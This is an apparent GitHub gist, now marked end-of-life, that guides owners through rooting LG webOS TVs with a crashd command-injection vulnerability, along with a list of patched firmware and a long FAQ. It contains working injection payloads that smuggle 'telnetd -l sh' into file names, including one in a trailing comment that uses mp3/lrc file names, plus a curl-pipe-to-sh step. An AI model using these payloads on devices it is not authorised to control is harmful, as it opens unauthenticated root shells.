Skip to content

Instantly share code, notes, and snippets.

@throwaway96
Last active November 8, 2024 09:40
Show Gist options
  • Save throwaway96/e811b0f7cc2a705a5a476a8dfa45e09f to your computer and use it in GitHub Desktop.
Save throwaway96/e811b0f7cc2a705a5a476a8dfa45e09f to your computer and use it in GitHub Desktop.
crashd instructions

News

EOL (2024-07-21)

I'm not going to be maintaining this document anymore. I'm leaving it as-is since much of the FAQ section is still accurate and has yet to be incorporated into other resources.

Use CanI.RootMy.TV to find an exploit for your TV.

New exploit for webOS 3.5+: DejaVuln (2024-04-21)

See dejavuln-autoroot for a simpler exploit that works on webOS 3.5+ TVs (i.e., models from 2017 and later). It is unpatched as of 2024-04-21 and does not require Developer Mode or even a network connection—just a USB drive.

Otherwise:

  • If you have a webOS 5–8 TV with old enough firmware, WTA (which does not require Dev Mode) will still work.
  • If you have a webOS 4.x TV, you can also try CVE-2023-6319, which is unpatched on the latest (final?) firmware for webOS 4.0 (2018) models.
  • While there will eventually be fully software-based exploits released for older models, they can currently be rooted via NVM.

If you have a 2024 webOS TV (webOS 24/9), please contact us on Discord.

The end of crashd

Warning

The current Dev Mode app prevents exploitation even on vulnerable firmware.

Since approximately 2024-04-02, the latest LG Dev Mode app (2.1.2 in the Content Store) copies and resets the permissions of jail_app.conf/jail_app.conf.sig on every boot. Therefore, jailpatch.sh etc. will no longer work, making creating files in /var/log/crashd impossible. It's not worth releasing a workaround, as the only models that haven't received patches removing clouduploadd have other vulnerabilities that do not require Dev Mode.

List of patched firmware

Important

Firmware that removes the vulnerability has been released for almost all models from 2019 and later.

LG has released firmware without clouduploadd—which contains the underlying vulnerability exploited in this guide—for nearly all webOS 4.5+ models. (No idea what's going on with LM21AN/W22A.) At this point, it looks like webOS 4.0 will not be patched.

Note: The information in this table is only useful if you somehow have an old version of the Dev Mode app installed and/or a method of exploiting clouduploadd that does not require writing to /var/log/crashd.

The first known patched firmware version for each OTAID is shown in the table below. Note that firmware versions for each OTAID should be considered separately.

How to use the table
  1. Get your TV's OTAID. The OTAID identifies what firmware your TV uses. As an example, the OTAID used by most 2023 OLEDs is HE_DTV_W23O_AFABATAA.
  2. Note the four-character section in the middle of the OTAID. It will start with "W" (unless your TV was not made by LG, in which case it will start with "C"). Next will be the last 2 digits of the year the model was released, followed by a letter identifying the SoC. For the example OTAID above, this would be W23O.
  3. Find the row in the table that matches your OTAID and note the versions shown. For the example W23O, 03.30.60 is listed as both the first prerelease and release version to be patched.
  4. Find your TV's firmware version. LG refers to it as the "software version". It is available in the section of the settings menu where you can disable automatic updates. It may also be displayed on the hidden menu accessible by pressing the mute button three times. For the sake of our example, say it is 03.30.70.
  5. Compare your firmware version with the ones listed in the table. If your firmware version is equal to or higher than either of the versions in the table, it is patched. For the above example, 03.30.70 is newer than 03.30.60, so the firmware is patched.

If your TV is running patched firmware, you will not be able to root it with this guide.

Notes: You should not have a prerelease firmware version unless you changed the NSU Mode in the Instart menu (which is generally not recommended). However, the table may be incomplete or out of date. Therefore if you have a release version that is newer than the prerelease version in the table, you should still assume it is patched (even if no release version is listed).

OTAIDFirst patched in
PrereleaseRelease
W23A03.20.6103.20.61
W23H03.30.6003.30.77
W23M03.30.8503.30.85
W23O03.30.6003.30.60
W23P03.30.6003.30.76
W22A04.41.10
W22H04.40.75
13.30.13
04.40.75
W22L04.40.8504.40.90
W22O04.40.80
13.30.15
04.40.90
W22P04.40.7504.40.85
C22H04.40.7503.34.40
C22P04.41.0003.34.40
N21D<03.43.11<03.43.11
W21A03.40.8003.40.80
W21K03.40.8503.40.85
W21O03.40.8503.40.85
W21P03.40.8003.40.80
W21U03.40.8003.40.80
W20H04.50.5604.50.56
W20L04.50.5604.50.56
W20O04.50.5604.50.56
W20P04.50.5604.50.56
C20P04.50.6104.50.61
W19H05.40.2005.40.20
W19O05.30.4505.30.45
W19P05.40.2005.40.20
W19R05.40.2005.40.20
W18A
W18H
W18M
W18O
W18R

Note: There are many models that we are unable to provide patch information for, but you may be able to help. Please contact us via Discord if you have a TV with an OTAID containing W22K, C22L, N22D, W23K, or W23L.

Introduction

THIS ONLY WORKS ON webOS 4+!

This guide explains how to root an LG TV using a vulnerability in crashd. It works on webOS 4 and above, but patched firmware is gradually being rolled out. This means that if your TV is not running at least webOS 4.0 (i.e., it is a 2018 model or newer), it is not vulnerable. If you are running an older version of webOS, your options are:

  • RootMyTV — Firmware released since roughly mid-2022 is probably not vulnerable. This document lists vulnerable versions for certain SoCs.
  • GetMeIn — No longer recommended. It only ever worked on certain combinations of SoCs and webOS versions. You would have to modify jail_app.conf to get access to /dev/mem, which is no longer possible since version 2.1.2 of the Dev Mode app. The getmein binary from the XDA thread is dangerous, as it automatically modifies start-devmode.sh in ways that can cause semi-permanent damage to your TV that will not be fixable with a factory reset. Additionally, it will result in apps being removed on webOS versions that have RootMyTV patched.
  • modifying debugstatus in the NVM — Involves opening your TV and directly accessing the an EEPROM IC. After enabling debug mode, you'll need to spawn a root shell and use it to permanently enable developer mode and install/elevate Homebrew Channel.

Please don't ask me whether a specific firmware version is vulnerable. First, I probably don't know. Second, I'll update this document if LG starts releasing patched firmware. See the News section above. Also note that a firmware version without the corresponding model number is practically meaningless.

It is recommended that anyone attempting this procedure do their own research in order to understand how the process works. In general, unless you understand exactly why you're doing something, you shouldn't do it. While there is relatively low risk of permanent damage to your TV, you're ultimately responsible if anything goes wrong.

This guide assumes you're working from a desktop PC, although the same process can be performed from a smartphone. Where PuTTY is used in this guide, any telnet client will work. You can also use LG's CLI tools or any SSH client instead of the Dev Manager program, although complete instructions for those are not (yet) provided. (There are some hints, though.)

If you have trouble with any of these steps, the solution is probably somewhere in this document. Basically everything that can go wrong is discussed in the FAQ section below (in particular the Rooting questions). If you're going to ask for help, make sure you know both the webOS and firmware/"software" versions. Also, if you are going to ask about a specific firmware version, please provide an OTAID so people can know what you're talking about.

General Tips

  • This will only work on webOS 4+.
  • You can copy and paste commands into recent versions of Dev Manager.
  • For many commands (e.g., touch, mkdir, rm), there will be no output if the command is successful. The prompt (>) in Dev Manager will be blue after a successful command and red after an error.
  • The commands involved in this process should complete more or less instantly. If it hasn't completed after 30 seconds, cancel it and try again.
  • Use the latest version of Dev Manager and Homebrew Channel.
  • Make sure Quick Start+ is disabled for rebooting to be effective.
  • OLEDs may have to be unplugged to properly reboot, as they can remain on for a while despite appearing to be off.

Steps

  1. Read this guide. Seriously. Especially the introduction above. Check the table at the top of this document to see if your firmware is patched. If your TV is already rooted, do not continue; you will lose root. If you have issues, look at the tips and FAQ before asking any questions. If your TV runs webOS 1, 2, or 3, stop now and read the introduction.

  2. Enable Developer Mode on the TV: See this guide from LG. If you have trouble (e.g., not getting the prompt to sign in), try rebooting. (You can ignore the "UPDATE NOTICE" about needing to install webOS TV CLI v1.12.4 or later.) A reboot is required after setting Dev Mode Status to ON. The Developer Mode app should look something like this:
    Developer Mode app

  3. Download and install the following software on your PC:

    Download the following file to your PC:

  4. Disable Quick Start+ on the TV. This is in the menu, but its exact location depends on the webOS version. For example, on webOS 5, after pressing the menu button on the remote, it can be found in All Settings > General > Additional Settings. On webOS 6 and 7, it is under All Settings > General > Devices > TV Management.

  5. Reboot the TV (e.g., by turning it off and then back on) again. This is in addition to the reboot required when enabling developer mode. Make sure Quick Start+ is disabled!
    Note: If you have an OLED TV, it may stay on for a while (to run the Pixel Refresher) despite appearing to be off. Thus, when you turn it back on, it won't have actually rebooted. You can unplug it to be sure it's off.

  6. In the LG Developer Mode app, enable the Key Server. It should look like this:
    Key Server enabled
    Note that the key server only needs to be enabled while you are connecting for the first time. It will be automatically disabled on reboot.

  7. In Dev Manager, perform these steps:
    a. Click "+ Add Device"
    b. Enter IP address of your TV in "Host Address" field
    c. Enter passphrase displayed on LG Developer Mode app in "Passphrase" field
    d. Keep other settings at default, click "Add" (troubleshooting errors)
    e. Click "Install" in the top right corner
    f. Choose Homebrew Channel IPK
    g. Make sure Homebrew Channel is installed on your TV
    h. Click on "Terminal"
    i. Use jailpatch.sh to generate an old jail_app.conf with a valid signature:

    curl -L -o /tmp/jailpatch.sh https://raw.githubusercontent.com/throwaway96/install-jail-conf/main/jailpatch.sh && sh /tmp/jailpatch.sh

    Make sure the output says verification of current conf successful before continuing.
    If it doesn't work, see the update about Dev Mode version 2.1.2.

  8. Reboot the TV (e.g., by turning it off and then back on) for a third time. Make sure Quick Start+ is disabled!

  9. In Dev Manager, go to "Terminal" and input this command EXACTLY, then press enter:

    touch /var/log/crashd/"x;telnetd -l sh"

    Note: The character after the dash is a lowercase L, not a one.
    If you get an error like sh: touch: not found, just repeat the command. When successful there should be no output.
    If you get a "Permission denied" error, you probably didn't complete the previous steps regarding jail_app.conf correctly or did not reboot afterward.

  10. In PuTTY perform these steps:
    a. Type your TV's IP address in "Host Name" field
    b. Validate that "Other" and "Telnet" are selected under "Connection type"
    PuTTY options
    Note: The default port of 23 is correct.
    c. Open the telnet connection to your TV. If you can't connect, see the FAQ for help.
    d. Execute this to give root permissions to Homebrew Channel (you can paste into PuTTY by right clicking or pressing Shift+Insert):

    /media/developer/apps/usr/palm/services/org.webosbrew.hbchannel.service/elevate-service

    e. Execute this command to ensure developer mode never expires:

    rm -rf /var/luna/preferences/devmode_enabled && mkdir -p /var/luna/preferences/devmode_enabled

    f. If you have used RootMyTV before (even unsuccessfully), execute this command to remove leftover files:

    rm /var/lib/webosbrew/startup.sh /mnt/lg/cmn_data/wam/extra_conf.sh
  11. Uninstall developer mode app from TV home menu.
    WARNING: Do NOT reinstall the LG Developer Mode app while your TV is rooted!

  12. Power off your TV. Make sure Quick Start+ is disabled!
    Note: If an "Install Homebrew Channel" prompt appears (unlikely), don't choose "yes".

  13. After restart, confirm that "Root status" in Homebrew Channel is "ok"

  14. Turn on SSH in Homebrew Channel and restart
    Note: The default SSH password is alpine.

  15. Enjoy your rooted TV!
    Note: If you want to block update notifications, you'll need to block certain domains.

Based on instructions by Shadow0304

If this guide helped you, please donate to support further development.

Notes

Authentication

The default root password (for SSH/SFTP) is alpine. Installing a public key for SSH authentication is recommended and will disable the default password. (The default password is not set on boot when /home/root/.ssh/authorized_keys exists.) This can be accomplished with the following commands:

mkdir -p /home/root/.ssh
chmod 700 /home/root/.ssh
echo '<key>' > /home/root/.ssh/authorized_keys
chmod 600 /home/root/.ssh/authorized_keys

Replace <key> with your key. It will look something like ssh-rsa LongBase64String== comment. See this guide for more information on setting up public key SSH authentication.

Homebrew Channel Version

Make sure you're using the latest version of Homebrew Channel (currently 0.6.3).

Versions

Note: The webOS version is not the same as the firmware version.

webOS versions

The TV models for each year all run the same major version of webOS. It is not possible to update from one major version to another, with a few exceptions. Note that webOS 3.0 and 3.5 are separate "major" versions despite having the same leading digit. This is also true for webOS 4.0 and 4.5.

Year Version Codename
2014 1.x afro
2015 2.x beehive
2016 3.0–3.4 dreadlocks
2017 3.5–3.9 dreadlocks2
2018 4.0–4.4 goldilocks
2019 4.5–4.10 goldilocks2
2020 5.x jhericurl
2021 6.x kisscurl
2022 7.x (22) mullet
2023 8.x (23) number1
2024 9.x (24) ombre

Each major version has a codename that is a hairstyle. Each minor version has a codename that is a national park (or similar). The full codename of webOS 4.5, for example, is goldilocks2-grandcanyon.

With webOS 7, LG added a marketing name of "webOS 22", with the 22 indicating the year (2022). The webOS 8/23 situation is similar.

Firmware versions

The firmware version is often called "software version". Firmware versions look like 03.44.55, with each of the three components being zero-padded to two digits. Production firmware versions all have a first component of at least 03, as lower numbers are reserved for testing.

FAQ

Index

General

Rooting

After rooting

General

How do I know what version of webOS I am running?

This information can be found in the menu (accessed by pressing the button with a gear on the remote). The exact location within the menu varies across webOS versions.

The firmware and webOS versions are shown in the Host Diagnostics (HostDiag) screen. I have written instructions for entering HostDiag.

You also may be able to find the webOS major version by pressing the mute button three times rapidly. This is an example on a webOS 6 TV:
webOS 6 hidden menu
Note that the firmware version and model number are also shown. On webOS 7, this window looks similar but lacks the "Platform" field.

However, on other webOS versions including 3.5, 4.0, and 5, only the firmware version is shown:
webOS 3.5/4.0 hidden menu webOS 5 hidden menu

webOS 6 and 7

To find the version number through the menu on webOS 6 or 7, first press the menu button on the remote, then choose "All Settings":
image

Next, choose "Devices" under "General":
image
Note: This screenshot is from webOS 6. The icons and some menu items are different on webOS 7.

Then select "TV Management", followed by "TV Information":
image image

The webOS version is under "webOS TV Version":
webos6-tvinfo

How can I find my TV's IP address?

The TV may have up to two IP addresses: one for the wired connection, and one for Wi-Fi. You can find the IP address for each interface by in the settings menu under "Network".

You can check whether you have the right IP address for your TV by connecting to either http://<tv ip>:3000/ or https://<tv ip>:3001/ in a web browser. At least one of these ports should be open as long as you have screen share/second screen/"LG Connect" enabled. Port 3000 should show a Hello world message, while you will likely get a certificate error on port 3001 (and bypassing that should also result in Hello world).

How do I reboot the TV?

If your TV is already rooted, you can use the "System reboot" feature on the Homebrew Channel settings screen or run the reboot command via SSH or telnet. These are effective regardless of whether Quick Start+ is enabled.

If Quick Start+ is not enabled, turning the TV off (so that the red standby LED comes on) and back on is usually sufficient. However, OLED TVs will sometimes appear to be off when they are actually running the Pixel Refresher. The Pixel Refresher is triggered on shutdown when the TV has been on for more than four hours since its previous run. To make sure that an OLED (or any TV) is actually off, you can unplug it. Unplugging the TV will also force a fresh boot when Quick Start+ is enabled.

If you still have trouble getting a proper reboot (possibly due to Snapshot Boot), you should be able to force a reboot by disabling certain EULA options. You can then re-enable them after the reboot.

Rooting

Why do I get a No such file or directory error?

LG released a new developer mode jail configuration around 2023-01-26 that does not mount /var/log/crashd. It results in an error like this:

~ $ touch /var/log/crashd/"x;telnetd -l sh"
touch: /var/log/crashd/x;telnetd -l sh: No such file or directory

This configuration is downloaded by the Developer Mode app. It is located in /media/developer and named jail_app.conf. It is accompanied by jail_app.conf.sig, a cryptographic signature used to prevent a modified configuration from working. However, if jail_app.conf is not present a default configuration will be used. Since the default configuration does mount /var/log/crashd, it will work for our purposes.

Deleting /media/developer/jail_app.conf and rebooting the TV would allow the exploit to work until an update to the Developer Mode app in March 2023. The permissions of /media/developer were restricted so that jail_app.conf could no longer be deleted. Its contents could still be overwritten with the same result, but firmware updates rolled out starting in June of 2023 prevent a jailed application from running when jail_app.conf exists without a valid signature. Therefore, an old version of jail_app.conf is now required.

Why didn't I see any output after running a command?

Some commands, such as touch, do not produce output when successful. As long as you do not see an error message, it likely worked. Dev Manager displays a blue > when the last command succeeded and a red one when it failed.

Why am I unable to connect to telnet with PuTTY?

First, confirm your firmware has not been patched.

Make sure your PuTTY configuration is correct:

  • Under "Connection type", select "Other" and "Telnet"
  • "Port" should be 23 (the default when "Telnet" is selected)
  • Ensure you are using the correct IP address for your TV

You can check whether the exploit was successful by running pgrep telnetd in the Dev Manager terminal. If the telnet server is running, this command will output a number. (The number itself is the process ID of the telnet server and is not important.)

Why am I seeing LD_PRELOAD errors while rooting?

These errors appear because LG set an environment variable incorrectly. They are harmless, but you can prevent them from appearing by running this command:

unset LD_PRELOAD

Why isn't telnetd starting?

Certain EULAs must be accepted in order for this exploit to work. If the touch command is successful but telnetd does not start, this may be the problem. There are two primary EULAs ("Terms of Use" and "Privacy Policy") that are known to be needed, at least in the United States. Other regions may require additional EULAs and/or have a single UI option control multiple underlying EULA settings. You can use the command below to check what you're actually enabling.

webos6-eula
Two EULAs accepted on webOS 6.

Changing "Privacy Policy" via the UI requires a reboot. How to find the EULA screen depends on the webOS version. On webOS 6, it can be reached by pressing the menu button then choosing All Settings > Support > Privacy & Terms > User Agreements.
webos6-privacy_terms webos6-useragreements

This command will tell you which EULAs have been accepted:

luna-send-pub -f -n 1 'luna://com.webos.settingsservice/getSystemSettings' '{"keys":["eulaStatus"]}'

The "Terms of Use" and "Privacy Policy" agreements correspond to networkAllowed and generalTermsAllowed, respectively.

How do I download the key for the developer mode SSH server?

To download the private key, named webos_rsa, "Key Server" must be enabled in the Developer Mode app. You don't need to reboot after enabling it. When it's enabled, the key file will be available via HTTP on port 9991. Thus it can be downloaded with a web browser at http://<TV IP>:9991/webos_rsa.

The webos_rsa file is encrypted. The passphrase needed to decrypt it is the 6-character string shown in the LG Developer Mode app.

Can I use something other than Dev Manager?

The webOS CLI tools can run commands and install apps on webOS TVs. You can find some additional information about using these on the webosbrew site. Note that there are some differences between the webOS OSE CLI tools and the webOS TV ones.

Any decent SSH client can also be used to run commands on the TV. The OpenSSH ssh client is commonly available on Linux and is an optional feature on recent versions of Windows. Assuming you've downloaded the private key file from the TV and have it in the current directory, you can SSH to the TV with the following command:

ssh -i webos_rsa -p 9922 prisoner@<TV IP>

The passphrase for the key is the 6-character string displayed in the LG Developer Mode app. It is case-sensitive. If you get an error like PTY allocation request failed on channel 0, you won't have a prompt or some shell features, but you should still have sufficient functionality to run commands and see their output.

Note that you may need additional options to allow older SSH features depending on your client. For example, you may get an error like this:

Unable to negotiate with 192.168.1.123 port 9922: no matching host key type found. Their offer: ssh-rsa

You should be able to solve the problem by adding the options -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa to the ssh command above.

If you want to use PuTTY, you'll have to convert the key file to PuTTY's PPK format using PuTTYgen. Open PuTTYgen and import the key using "Import key" in the "Conversions" menu. You'll need the 6-character passphrase displayed in the LG Developer Mode app to decrypt it. After it's loaded, you can optionally change or remove the passphrase for the generated PPK by editing the "Key passphrase" and "Confirm passphrase" fields. (If you leave them alone, the PPK will have the same passphrase as the original key.) To save the PPK file, click the "Save private key" button.

Apps can be installed by transferring the IPK using SFTP then running luna-send-pub on the TV with the appropriate arguments. To connect with the OpenSSH command-line sftp client, you can use:

sftp -i webos_rsa -P 9922 prisoner@<TV IP>

How do I install an app from the command line?

App installation is triggered over the Luna bus. The prisoner user available in developer mode has limited access to the Luna bus using the luna-send-pub command. To install an app, the IPK file must already be on the TV. Files can be transferred using SFTP.

The Luna endpoint for installing developer mode apps is luna://com.webos.appInstallService/dev/install. Luna calls include a JSON payload. For this endpoint, the id, ipkUrl, and subscribe parameters are required. The path of the IPK is supplied in ipkUrl. Setting subscribe to true (along with the -i flag) means that multiple response messages will be sent as the status of the request changes. The contents of id are not important here.

For example, if the IPK of the app you want to install exists at /tmp/app.ipk, you could use the following command to install it:

luna-send-pub -i 'luna://com.webos.appInstallService/dev/install' '{"id":"com.ares.defaultName","ipkUrl":"/tmp/app.ipk","subscribe":true}'

There will be a series of messages as the installation progresses. After the process completes, you'll have to press control+C to kill luna-send-pub.

Note that developer mode apps are installed in a different location than apps installed via the store, and they are deleted when developer mode is disabled or expires.

Why doesn't the Dev Mode app's key server stay enabled after rebooting?

That's how it's supposed to work. The key server is only necessary the first time you connect to the TV. Dev Manager downloads the key file and saves it for future use. (For other clients, you usually have to download the key file yourself.) You may need to enable the key server again if you do something that changes the key (e.g., factory reset) or you are connecting from a different client that doesn't already have the key. Otherwise, the same key will continue to work.

How can I verify the signature of jail_app.conf?

If you would like to verify that your jail_app.conf and jail_app.conf.sig match, you can use the following command:

openssl smime -verify -noverify -inform pem -in jail_app.conf.sig -content jail_app.conf >/dev/null

Why can't I add my TV in Dev Manager?

When you add a device in using the "Developer Mode" authentication method, Dev Manager downloads the RSA key from an HTTP server on port 9991. This is what "Key Server" in the Developer Mode app refers to.

If you get a "failed to fetch private key" error when trying to add your TV in Dev Manager, Dev Manager was unable to retrieve the RSA key.
Failed to fetch private key

Make sure you are using the correct IP address for your TV. You can try downloading the key with a web browser to check that the Key Server is working.

If you're unable to download the key, the problem is likely on the TV side. You can try disabling and re-enabling Dev Mode to fix the key server. If it still doesn't work, try leaving Developer Mode enabled and forcing a reboot using the EULA method. Remember to re-enable the Key Server after rebooting.

After rooting

Why do I still see update notifications?

Homebrew Channel's startup scripts currently run relatively late in the boot process. This means the TV's update program has already started by the time Homebrew Channel's "Block system updates" option has had a chance to take effect. If you want to make sure updates are completely disabled (and not see the notifications), block these domains (e.g., on your router):

snu.lge.com
su.lge.com
su-ssl.lge.com
snu-dev.lge.com
su-dev.lge.com
nsu.lge.com

(Listed roughly in order of importance.)

Why doesn't SSH (or telnet/other services) start at boot?

Note that the autostart method used by Homebrew Channel 0.5.1+ on webOS 4.5+ only works when certain EULAs have been accepted. Which EULAs are required depends on your region but seem to be the same as those discussed in this section.

webOS 4.0–4.4

The method used for autostart by Homebrew Channel 0.5.1+ only works on webOS 4.5+. A new autostart method will be implemented in future Homebrew Channel versions, but you can try setting it up manually yourself. It is described here. You can also try the webosbrew-autostart app as a workaround.

webOS 4.5–4.9

There is a bug in Homebrew Channel 0.5.1 that may prevent the startup.sh file from being automatically installed on webOS versions older than 5.0. This was fixed in Homebrew Channel 0.6.0. You can also install the startup script manually:

mkdir -p /var/lib/webosbrew
cp /media/developer/apps/usr/palm/services/org.webosbrew.hbchannel.service/startup.sh /var/lib/webosbrew/startup.sh
chmod 755 /var/lib/webosbrew/startup.sh
chown root:root /var/lib/webosbrew/startup.sh

webOS 7/22

If you are using Homebrew Channel 0.5.1 on webOS 22 (internally, webOS 7), the included SSH server won't work. Homebrew Channel 0.6.0 and later include binaries that are compatible with webOS 22. If for some reason you can't update Homebrew Channel, patched binaries are attached to previous revisions of this guide.

Should I re-enable Quick Start+ after rooting?

It's up to you. Just be aware that when Quick Start+ is on, turning the TV off won't actually shut it down. If you need to perform a proper reboot (e.g., so that startup scripts will run), you can use "System reboot" on the Homebrew Channel settings page.

Can I update to a new firmware release?

In general, updating is not recommended because LG could fix vulnerabilities used for rooting. The crashd vulnerability has been patched in the latest firmware for most post-2018 models, although you should retain root during a firmware update with Homebrew Channel 0.5.1+. (Note that this does not necessarily apply if your TV was rooted with RootMyTV or GetMeIn.)

See the list of patched firmware to determine whether there is a known patched version for your OTAID. If there is no production version listed, it should still be vulnerable after an update. It is always possible that LG has released a new version since the list was last updated, though. Also, if you messed with the NSU Mode setting in the Instart menu, you may be updating to a prerelease version (which is not recommended).

Note that if you lose root for any reason after updating to a firmware version that is not rootable, there is no way to regain it until new a exploit is released. There are a number of situations (e.g., running out of space, database corruption) that will cause webOS to automatically reset itself in a way that will cause root to be lost.

If you are going to ask about anything relating to a specific firmware version, please provide an OTAID so people can know what you're talking about.

How do I find my TV's OTAID?

The OTAID is an identifier included in every EPK (i.e., firmware image) and used with LG's SNU update system to request the latest firmware update information. For example, the OTAID for 2021 TVs with a K7Lp SoC is HE_DTV_W21P_AFADATAA. There are several ways to find your TV's OTAID.

First, you can use nyx-cmd (this may not work if you don't have root):

nyx-cmd DeviceInfo query hardware_id

Second, it should be in /var/run/nyx/device_info.json, which contains JSON-formatted output from nyx-cmd. You can view it by running cat /var/run/nyx/device_info.json, and the OTAID will be on the hardware_id line. This file also has other information such as the TV's model number and SoC. You may not want to share its full contents in public, as it contains unique identifiers for your TV (specifically: the serial number, MAC address(es), and NDUID).

Third, you can use a Luna request, which should not require root:

luna-send-pub -n 1 'luna://com.webos.service.tv.systemproperty/getSystemInfo' '{"keys":["otaId"]}'

The otaId key seems to only be available on webOS 4.0+. Use another method for earlier webOS versions (but note that webOS versions prior to 4.0 are not vulnerable to the crashd exploit).

Another option is to make a request over SSAP to the URI ssap://com.webos.service.update/getCurrentSWInformation with an empty payload ({}). The response's model_name property will contain the OTAID.

There is a file in the TV's /etc/starfish directory that contains the OTAID. Its name is either /etc/starfish/model_id (on older webOS versions) or /etc/starfish/model_id.json (on newer webOS; also contains SoC, region, and webOS major version).

How do I perform a firmware downgrade?

LG has blocked firmware downgrades, even with "expert mode" enabled. Downgrades are only allowed when an AccessUSB device is connected. (AccessUSB devices are hardware tokens that enable debug access. They are presumably provided to LG partners on a limited basis.)

I have a tool to restore access to the "expert mode" features, including installing firmware with a lower version and NSU images. However, it is (semi-intentionally) not user-friendly and only intended for use by those with the ability to recover if something goes wrong. It is probably a good idea to perform a factory reset after downgrading.

Can I upgrade to a new webOS version?

While updating your firmware may increase the webOS minor version, it is usually not possible to update across major versions. This includes updating from 3.4 to 3.5+ or 4.4 to 4.5+.

However, in late 2023 LG announced their webOS Re:New program (with an apparent internal codename of pine), which will eventually allow certain high-end 2022 models to be upgraded to webOS 8 (a.k.a. webOS 23). So far (2024-02-18) it has not been officially released outside of Korea, and changing your NSU Mode in order to upgrade early may get you into trouble unless you really know what you're doing. The only SoCs that LG currently seems to be working on support for are O22 (including O228K) and K8Hp.

In February 2024, LG opened a beta program that provides access to the webOS 23 upgrade. It is currently only available in certain regions (possibly just the US and Korea). For more information, see the webOS TV Beta Program site for your region:

So far most of LG's beta programs seem to have been private. However, since they have publicized the Beta Program site and app, they may be planning to offer more public betas in the future. So it might be worth signing up even if you're not eligible for the webOS 23 upgrade test.

Should I change the "NSU Mode" setting in the Instart menu?

If you have to ask, the answer is no. You should leave it on the default ("User Mode") unless you really know what you're doing and understand the implications.

Setting NSU Mode to anything other than User Mode may result in updates to prerelease firmware. Prerelease firmware can be broken in various ways. It often has a higher version number than following release versions, meaning you may not be able to return to release firmware for some time. Unless you have a way to reprogram the eMMC with a working firmware image and otherwise recover from a broken system, you should avoid prerelease firmware.

If you do update to a prerelease firmware version, you may have to perform a factory reset to restore some functionality. While downgrading is technically possible with root, it is obviously not supported by LG and may not go smoothly.

How do I install APKs on webOS?

You can't. APKs are for Android, and webOS is not Android.

Can I redirect audio output through a USB DAC?

While it may be possible to build the appropriate kernel drivers, it is unlikely you would be able to get much of the TV's audio output to use such a device. Some audio goes through PulseAudio (and ALSA output is directed through PulseAudio), but the media playback pipeline uses proprietary, undocumented SoC audio peripherals. It may (or may not) be theoretically possible to reverse engineer these enough to be able to redirect audio, but it would almost certainly be a major undertaking requiring significant skill and a substantial time commitment.

Can I add support for new filesystems?

You can build the kernel modules needed to support various filesystems. However, you would not be able to truly integrate any of them into webOS, as filesystem support is hardcoded in various system applications such as Attached Storage Manager (ASM) and Physical Device Manager (PDM).

How do I disable automatic firmware updates?

The "Auto Update" setting can be found in the menu. The steps to reach this setting vary across webOS versions.

On webOS 6, it can be found by pressing the menu button, choosing "All Settings", "Support", then "Software Update":
image

The firmware version is also displayed here.

Why are all my apps deleted after 6 weeks (or after rebooting)?

If all your installed apps are being deleted 6 weeks or so after installation (due to the expiration of the development mode timer, which is now 1000 hours) or on boot, your TV is likely not properly rooted. The /var/luna/preferences/devmode_enabled directory created during the above procedure should stop development mode apps from being deleted.

You should not install the LG developer mode app when rooted, as it can cause all apps to be removed. The existence of /var/luna/preferences/devmode_enabled as a directory may prevent LG's developer mode app from working. If you lose root access while this directory exists, a factory reset may be required in order to get the developer mode app working.

Why did I lose root after updating the Homebrew Channel app?

LG changed something in webOS 7 that causes Homebrew Channel's self-update feature to fail in all versions prior to 0.6.3. If you have webOS 22/7, don't update Homebrew Channel from within the app unless it's at least version 0.6.3. Updating Homebrew Channel using current versions of Dev Manager (at least through v1.9.11) will also cause root to be lost.

You can use the Homebrew Channel Updater tool, which is in the default Homebrew Channel repo, to safely update on webOS 7. It is also possible to update manually as long as you keep a telnet/SSH session open to run /media/developer/apps/usr/palm/services/org.webosbrew.hbchannel.service/elevate-service after the update completes and before rebooting.

Why can't I connect to my TV with Dev Manager after uninstalling the LG Developer Mode app?

The SSH server on port 9922 is provided by LG's Developer Mode app, which is uninstalled at the end of the rooting process. After rooting, you can enable Homebrew Channel's SSH server, which uses port 22. You'll need to reconfigure Dev Manager to use this new SSH server, including changing the login credentials. The easiest way to accomplish this is adding a new device within Dev Manager.

Dev Manager Add Device
How to configure Dev Manager to connect to a TV using the default password.

The username is root. If you have not set up public key authentication, you must select "Password" from the "Authentication Method" dropdown and enter the password alpine. If you are using a public key, you'll need to choose the "Local Private Key" authentication method, then enter its name and passphrase. The key file itself must be placed in the ~/.ssh directory (or %USERPROFILE%\.ssh on Windows). Note that current versions of Dev Manager support a somewhat limited range of key types.

How do I determine what SoC my TV has?

The name of the SoC is displayed in the Instart menu next to "Chip Type".

instart-soc-k7lp
This TV has a Realtek K7Lp SoC.

You can also find it by running this command:

nyx-cmd DeviceInfo query device_name

The same information can be found in the file /var/run/nyx/device_info.json, which is created at boot from the output of nyx-cmd.

Can I install Android (or some other OS) on my LG TV?

The practical answer is no. LG uses a secure boot system that verifies the signatures of all system components. The TV will refuse to boot if anything (e.g., bootloader, kernel, root filesystem) is not signed with the correct LG key. Additionally, there is no documentation or code available for most of the interesting peripherals (such as the video pipeline), meaning a hypothetical Android system would not be particularly useful.

While it is technically possible to bypass some of the secure boot chain and run unsigned code, all existing attempts to do so are proofs of concept and nowhere near ready for any kind of serious use.

How can I free up space on my TV?

The eMMC storage on many webOS TVs is not very large. The filesystem structure is also complex, with many partitions being mounted in multiple places. The vast majority of usable space is on either the apps or data partition. The mount points of the apps partition (which, as its name suggests, primarily stores apps) include /media and /mnt/lg/appstore. Most of the other writable space (including /home, /var, and several directories under /mnt/lg/cache) is on the data partition, which is mounted at /mnt/lg/cmn_data.

You can use findmnt and df to get more information about mount points and free space. The names and sizes of all eMMC partitions are listed in /proc/partinfo. Some models ship with large sample files in /media/preload/storedemo that do not seem to be important.

As an example, on a 2018 TV with an LM18A SoC, the apps partition has a total size of less than 600 MB, while the data partition is exactly 500 MiB. This TV had a 300 MB+ video named /media/preload/storedemo/Swiss_171026_LCD_UHD_HDR_01.lge; deleting it has not caused any problems.

License

Creative Commons License
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.

Donations

I have a large collection of TV boards and supporting hardware that I use for development and testing of stuff like this. It can get expensive (especially with all the weird cables LG likes to use). If you can afford to, please donate via ko-fi to support my work. I also may be interested in TV parts (and other electronics or test/measurement gear).

@jacobcxdev
Copy link

  1. Create an empty mp3 called myaud_$(telnetd$IFS-lsh).mp3
  2. Create a file with content 0xFFFE0000 and file name myaud_$(telnetd$IFS-lsh).lrc
